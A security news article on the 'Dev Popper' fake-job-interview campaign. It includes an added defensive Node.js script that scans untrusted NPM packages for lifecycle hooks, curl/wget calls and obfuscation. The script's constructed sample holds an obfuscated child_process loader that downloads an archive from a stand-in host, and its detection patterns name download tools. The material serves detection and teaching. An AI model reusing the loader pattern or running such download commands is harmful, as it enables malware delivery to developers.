In fake job interviews, developers are coerced into installing Python backdoors

Securonix analysts have discovered a new campaign called Dev Popper targeting software developers. Hackers conduct fake interviews to lure victims into installing a Python Remote Access Trojan (RAT).

The Dev Popper attacks utilize a multi-stage infection chain based on social engineering, aimed at deceiving victims through gradual compromise. According to researchers, these attacks are likely orchestrated by North Korean threat actors, although there is currently insufficient data for precise attribution.

Researchers note that hackers “exploit the professional engagement of developers and their trust in the job application process, where refusing actions by the interviewer can endanger the job opportunity itself,” making the attacks highly effective.

Typically, hackers pose as employers claiming to have job vacancies for developers. During the interview, they ask candidates to download and execute a task from a GitHub repository. However, the real goal of the attackers is to make the victim download malware that collects system information and provides attackers with remote access to the host.

The “task” file is usually a ZIP archive containing an NPM package with a README.md and frontend and backend directories. When the developer runs this NPM package, a hidden obfuscated JavaScript file (imageDetails.js) in the backend directory is activated; it executes curl commands via the Node.js process to download an additional archive (p.zi) from an external server.

Inside this archive hides the payload of the next stage of the attack—an obfuscated Python script (npl), which is a Remote Access Trojan.
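The infection chain above depends on the developer running an unreviewed NPM package, so the practical defence is to triage the archive statically before anything in it is executed. The following is an added example (not Securonix's tooling and not code from the campaign): a small Node.js script that reads a package's lifecycle scripts, decodes `\xNN`/`\uNNNN` string escapes, and flags JavaScript files that combine a `child_process` import, a curl/wget call, and obfuscation markers such as `_0x…` identifiers. It works over an in-memory map of path to file text so it runs offline; the sample package, its file names and the `c2.example.invalid` host are constructed for this example.

```javascript
'use strict';
// Added example: static triage of an untrusted NPM "take-home task" before
// `npm install` or `npm start`. Operates on { 'relative/path': 'contents' };
// replace `samplePackage` with a recursive directory read to scan a real
// unpacked archive.

// Hooks npm runs automatically; any command here executes without a prompt.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prestart', 'start'];

// Indicators of download-and-run behaviour or of hiding what the code does.
const JS_INDICATORS = [
  { id: 'child_process', re: /\brequire\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { id: 'curl-or-wget', re: /\b(curl|wget)\b/ },
  { id: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'hex-identifiers', re: /_0x[0-9a-f]{4,}/i },
  { id: 'escaped-strings', re: /(\\x[0-9a-f]{2}){4,}/i },
  { id: 'base64-decode', re: /Buffer\.from\([^)]*['"]base64['"]\)|\batob\s*\(/ },
];

// Decodes \xNN and \uNNNN escapes so keywords hidden inside escaped string
// literals (a common obfuscator trick) become visible to the keyword checks.
function decodeEscapes(source) {
  return source
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Returns the lifecycle hooks present in package.json with their commands.
function findLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => Object.prototype.hasOwnProperty.call(scripts, hook))
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Scores one JavaScript file; returns the ids of the indicators that matched,
// checking both the raw text and the escape-decoded text.
function scoreJsFile(source) {
  const decoded = decodeEscapes(source);
  const hits = JS_INDICATORS
    .filter(({ re }) => re.test(source) || re.test(decoded))
    .map(({ id }) => id);
  // Minified or obfuscated loaders usually pack everything onto one long line.
  const longestLine = Math.max(...source.split('\n').map((l) => l.length));
  if (longestLine > 500) hits.push('long-line');
  return hits;
}

// Scans a whole package and returns a report with a coarse verdict.
function scanPackage(files) {
  const report = { lifecycle: [], files: [], verdict: 'clean' };
  if (files['package.json']) report.lifecycle = findLifecycleScripts(files['package.json']);
  for (const [path, source] of Object.entries(files)) {
    if (!/\.(c|m)?js$/.test(path)) continue;
    const indicators = scoreJsFile(source);
    if (indicators.length) report.files.push({ path, indicators });
  }
  // A file that can both spawn processes and call curl/wget is the stage-one
  // loader pattern; obfuscation alone or auto-run hooks alone merit a review.
  const downloader = report.files.some((f) =>
    f.indicators.includes('child_process') && f.indicators.includes('curl-or-wget'));
  const obfuscated = report.files.some((f) =>
    f.indicators.some((i) => ['hex-identifiers', 'escaped-strings', 'dynamic-eval', 'long-line'].includes(i)));
  if (downloader) report.verdict = 'suspicious';
  else if (obfuscated || report.lifecycle.length) report.verdict = 'review';
  return report;
}

// Constructed sample package shaped like the one described in the write-up.
// backend/imageDetails.js is a harmless stand-in (text only, never executed):
// hex-style identifiers, an escaped "curl" string, and a child_process call.
const samplePackage = {
  'README.md': '# Interview task\nRun `npm install && npm start`, then open http://localhost:3000.\n',
  'package.json': JSON.stringify({
    name: 'interview-task',
    version: '1.0.0',
    scripts: { start: 'node backend/server.js' },
  }),
  'backend/server.js': "require('./imageDetails.js');\nconsole.log('listening');\n",
  'backend/imageDetails.js':
    "const _0x3f1a=require('child_process');" +
    "const _0x9c2d='\\x63\\x75\\x72\\x6c -o p.zi http://c2.example.invalid/p.zi';" +
    "_0x3f1a.exec(_0x9c2d);",
  'frontend/app.js': "document.getElementById('root').textContent = 'hello';\n",
};

console.log(JSON.stringify(scanPackage(samplePackage), null, 2));
```

On the sample package the verdict is `suspicious`, with `backend/imageDetails.js` flagged for `child_process`, `curl-or-wget`, `hex-identifiers` and `escaped-strings`; the `curl` keyword is only found because the escapes are decoded first, which is the reason the keyword checks run over both the raw and the decoded text. A `review` verdict is deliberately conservative: a `start` script by itself is normal, but it is still the line that will be executed on `npm start`, so it is worth reading before running anything from an unknown "employer".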

Once the RAT is activated on the victim’s system, it collects and transmits essential system information to a command server, including the OS type, hostname, and network parameters.

Securonix reports that the RAT possesses the following capabilities:

  • Establishing a persistent connection for ongoing control;
  • Searching for and stealing specific files and data from the file system;
  • Remote command execution for utilizing additional exploits and deploying malware;
  • Direct FTP data exfiltration from folders like Documents and Downloads;
  • Monitoring clipboard content and keystrokes to track user actions and potentially capture credentials.

It is worth noting that in recent years, there have been numerous warnings (1, 2, 3, 4) indicating that North Korean hackers use fake job openings to establish contacts and subsequently compromise IT security researchers, media organizations, software developers (especially for DeFi platforms), and aerospace organization employees.
